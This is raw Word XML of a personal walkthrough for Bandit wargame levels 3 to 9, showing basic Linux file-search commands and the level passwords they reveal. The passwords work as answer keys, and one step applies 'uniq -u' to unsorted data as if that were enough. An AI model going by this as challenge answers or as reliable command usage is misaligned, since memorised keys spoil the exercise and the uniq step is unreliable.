          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. There was a directory named </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2052">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“inhere”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C246262" w14:textId="77777777" w:rsidR="00FD2052" w:rsidRDefault="00FD2052" w:rsidP="001E43F7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 entered the directory using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2052">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cd inher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008B852" w14:textId="0A108AED" w:rsidR="001E43F7" w:rsidRDefault="00FD2052" w:rsidP="00997DD5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fter that I used the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2052">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2052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command again, and I saw nothing.</w:t>
      </w:r>
      <w:r w:rsidR="008A38E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I used the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2052">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls -la</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2052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for displaying all files and sub directories and I saw there was a hidden file named </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2052">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“.hidden”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1D09BF9" w14:textId="365F2714" w:rsidR="008A38EB" w:rsidRPr="00FD2052" w:rsidRDefault="008A38EB" w:rsidP="001E43F7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displaying the file context I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="008A38EB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat .hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the password was there: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A38E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pIwrPrtPN36QITSp3EQaw936yaFoFgAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429F5F90" w14:textId="7237545C" w:rsidR="004F2D5D" w:rsidRDefault="004F2D5D" w:rsidP="001E43F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FAC3978" w14:textId="5DE38EA2" w:rsidR="008A38EB" w:rsidRDefault="006B12D1" w:rsidP="001E43F7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6B12D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE3C047" w14:textId="366E36DA" w:rsidR="006B12D1" w:rsidRDefault="006F3207" w:rsidP="001E43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3207">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="006F3207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command for displaying the folder context. I saw there was a directory named “inhere”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3B0A89" w14:textId="5930DCB6" w:rsidR="006F3207" w:rsidRDefault="006F3207" w:rsidP="001E43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3207">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cd inhere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for entering the directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42901758" w14:textId="490E2257" w:rsidR="006F3207" w:rsidRDefault="006F3207" w:rsidP="001E43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3207">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="006F3207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gain for displaying all directory’s files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E484E75" w14:textId="1D533B38" w:rsidR="006F3207" w:rsidRDefault="006F3207" w:rsidP="001E43F7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re was 10 files</w:t>
      </w:r>
      <w:r w:rsidR="0096649D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0096649D" w:rsidRPr="0096649D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-file00</w:t>
      </w:r>
      <w:r w:rsidR="0096649D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, -file01, -file02, ….., </w:t>
      </w:r>
      <w:r w:rsidR="0096649D" w:rsidRPr="0096649D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-file09</w:t>
      </w:r>
      <w:r w:rsidR="0096649D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E64201" w14:textId="37AE5527" w:rsidR="001E43F7" w:rsidRDefault="0096649D" w:rsidP="00997DD5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In the mission description they said that the password is inside a readable file (meaning inside </w:t>
      </w:r>
      <w:r w:rsidR="00284403">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ASCII Text file). I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00284403">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file ./*</w:t>
      </w:r>
      <w:r w:rsidRPr="00284403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for displaying all files types.</w:t>
      </w:r>
      <w:r w:rsidR="006C3115">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The only readable file was </w:t>
      </w:r>
      <w:r w:rsidR="006C3115" w:rsidRPr="006C3115">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-file07</w:t>
      </w:r>
      <w:r w:rsidR="006C3115">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398C4D65" w14:textId="7A88332F" w:rsidR="006C3115" w:rsidRDefault="006C3115" w:rsidP="001E43F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displaying the password, I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="006C3115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cat </w:t>
      </w:r>
      <w:r w:rsidR="003D0271">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:r w:rsidRPr="006C3115">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-file07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003D0271">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D0271" w:rsidRPr="003D0271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koReBOKuIDDepwhWk7jZC0RTdopnAYKh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56208F5A" w14:textId="3A286482" w:rsidR="003D0271" w:rsidRDefault="003D0271" w:rsidP="001E43F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3AA4AFE2" w14:textId="02993D04" w:rsidR="003D0271" w:rsidRDefault="003D0271" w:rsidP="001E43F7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3D0271">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC68537" w14:textId="18F2ECC3" w:rsidR="003D0271" w:rsidRDefault="00ED3D59" w:rsidP="001E43F7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the description they said that the password’s file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A71B222" w14:textId="4D2E8D17" w:rsidR="00ED3D59" w:rsidRDefault="00ED3D59" w:rsidP="001E43F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uman readable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE795AF" w14:textId="6501C88F" w:rsidR="00ED3D59" w:rsidRDefault="00ED3D59" w:rsidP="001E43F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033 bytes in size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2203D3AE" w14:textId="0B79B5DB" w:rsidR="00ED3D59" w:rsidRDefault="00ED3D59" w:rsidP="001E43F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t executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5742516C" w14:textId="77777777" w:rsidR="001E43F7" w:rsidRPr="001E43F7" w:rsidRDefault="001E43F7" w:rsidP="001E43F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F4DC52B" w14:textId="360595B5" w:rsidR="001E43F7" w:rsidRDefault="0009694D" w:rsidP="00997DD5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fter reading inside the find man page (using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="0009694D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>man find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) and searching within it (using /&lt;word to search&gt;) I found out that for finding the wanting file I need to enter the following command: </w:t>
      </w:r>
      <w:r w:rsidR="00ED3D59" w:rsidRPr="00ED3D59">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>find -readable -size 1033c \! -executable -print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidR="00706142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The output was: </w:t>
      </w:r>
      <w:r w:rsidR="00706142" w:rsidRPr="00706142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“./maybehere07/.file2”</w:t>
      </w:r>
      <w:r w:rsidR="00706142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731BD157" w14:textId="63CBE3CB" w:rsidR="00706142" w:rsidRDefault="00706142" w:rsidP="001E43F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displaying the password, I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00706142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidRPr="00706142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Pr="00706142">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./maybehere07/.file2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706142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DXjZPULLxYr17uwoI01bNLQbtFemEgo7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C473A0" w14:textId="77777777" w:rsidR="0009694D" w:rsidRDefault="0009694D" w:rsidP="001E43F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7A66FE5A" w14:textId="5433DC51" w:rsidR="00F35624" w:rsidRDefault="00F35624" w:rsidP="001E43F7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F35624">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F8EBFF" w14:textId="7CBA40FD" w:rsidR="0009694D" w:rsidRDefault="0009694D" w:rsidP="001E43F7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the description they said that the password’s file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105C2BFD" w14:textId="6F4D76F2" w:rsidR="0009694D" w:rsidRPr="0009694D" w:rsidRDefault="0009694D" w:rsidP="001E43F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n be anywhere in the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68823E9F" w14:textId="56EA8DF7" w:rsidR="0009694D" w:rsidRDefault="0009694D" w:rsidP="001E43F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wned by user bandit7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5526AD" w14:textId="6846EC70" w:rsidR="0009694D" w:rsidRDefault="0009694D" w:rsidP="001E43F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wned by group bandit6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571FA397" w14:textId="77777777" w:rsidR="0009694D" w:rsidRDefault="0009694D" w:rsidP="001E43F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3 bytes in size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658DA05C" w14:textId="77777777" w:rsidR="0009694D" w:rsidRDefault="0009694D" w:rsidP="001E43F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B11C958" w14:textId="2466298F" w:rsidR="001E43F7" w:rsidRPr="001E43F7" w:rsidRDefault="0009694D" w:rsidP="001E43F7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fter reading inside the find man page (using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="0009694D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>man find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) and searching within it (using /&lt;word to search&gt;) I found out that for finding the wanting file I need to enter the following command: </w:t>
      </w:r>
      <w:r w:rsidRPr="0009694D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find / </w:t>
      </w:r>
      <w:r w:rsidR="00DB09A0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-user bandit7 </w:t>
      </w:r>
      <w:r w:rsidRPr="0009694D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-group bandit6 -size 33c</w:t>
      </w:r>
      <w:r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2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidR="00DB09A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. The output was: </w:t>
      </w:r>
      <w:r w:rsidR="00DB09A0" w:rsidRPr="00DB09A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“/var/lib/dpkg/info/bandit7.password”</w:t>
      </w:r>
      <w:r w:rsidR="00DB09A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2287AB5F" w14:textId="0F4D00BF" w:rsidR="001E43F7" w:rsidRDefault="0009694D" w:rsidP="00997DD5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[</w:t>
      </w:r>
      <w:r w:rsidR="00210C01" w:rsidRPr="00210C01">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidR="00210C01">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for not displaying the find error message like permissions]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A9B3F" w14:textId="1AACB243" w:rsidR="00DB09A0" w:rsidRDefault="00DB09A0" w:rsidP="001E43F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displaying the password, I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB09A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /var/lib/dpkg/info/bandit7.password</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA54C1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706142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 </w:t>
      </w:r>
      <w:r w:rsidR="00FA54C1" w:rsidRPr="00FA54C1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HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A87567" w14:textId="77777777" w:rsidR="001E43F7" w:rsidRDefault="001E43F7" w:rsidP="001E43F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BE805FD" w14:textId="3C769A63" w:rsidR="005D6A9C" w:rsidRDefault="005D6A9C" w:rsidP="001E43F7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5D6A9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A1F0EF" w14:textId="2F31F4A2" w:rsidR="00102805" w:rsidRDefault="00102805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For finding the line that contains the word millionths I put the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F6DD5" w14:textId="3590B757" w:rsidR="00102805" w:rsidRDefault="00102805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02805">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat data.txt | grep millionths</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and got the following output: </w:t>
      </w:r>
      <w:r w:rsidRPr="00102805">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">millionth       </w:t>
      </w:r>
      <w:r w:rsidRPr="00102805">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cvX2JJa4CFALtqS87jk27qwqGhBM9plV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD643B3" w14:textId="77777777" w:rsidR="001E43F7" w:rsidRDefault="001E43F7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05C87D3D" w14:textId="6A6D5C04" w:rsidR="00102805" w:rsidRDefault="00102805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102805">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006FF1A7" w14:textId="12E2CBBF" w:rsidR="00102805" w:rsidRDefault="00D5259E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For finding </w:t>
      </w:r>
      <w:r w:rsidR="006007B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>the only line that occurs only once I entered the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539CD640" w14:textId="3BA171C8" w:rsidR="001E43F7" w:rsidRDefault="006007B3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6007B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cat data.txt | uniq -u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and got the following output: </w:t>
      </w:r>
      <w:r w:rsidRPr="006007B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D22A7" w14:textId="556B7142" w:rsidR="006007B3" w:rsidRDefault="006007B3" w:rsidP="001E43F7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006007B3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4C307" w14:textId="201117F1" w:rsidR="006007B3" w:rsidRDefault="00B16A39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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">For displaying all the lines that start with several ‘=’ we need to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16A39">
        <w:rPr>
